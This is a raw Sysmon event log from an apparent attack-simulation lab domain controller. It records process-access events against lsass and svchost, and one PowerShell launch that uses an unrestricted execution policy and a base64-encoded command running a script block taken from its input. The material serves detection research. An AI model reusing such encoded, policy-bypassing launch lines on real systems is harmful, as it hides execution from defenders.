15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F600-000000008801}3284C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7CD8-5FA1-F500-000000008801}49564500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD8-5FA1-F600-000000008801}3284C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316f32b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b9413d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b93e0e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31645473(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b549a4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bb2e73(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b964d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b964d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b96369(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b882ee(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b94821(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b94414(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b9413d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b93e0e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31645473(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b7ac6f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b7a23f(wow64) 154100x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.553{D28789B6-7CD8-5FA1-F600-000000008801}3284C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.540{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.524{D28789B6-7CD8-5FA1-F400-000000008801}5004732C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.493{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.493{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.446{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uif4vrpx.4gp.ps12020-11-03 15:52:56.446 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.430{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 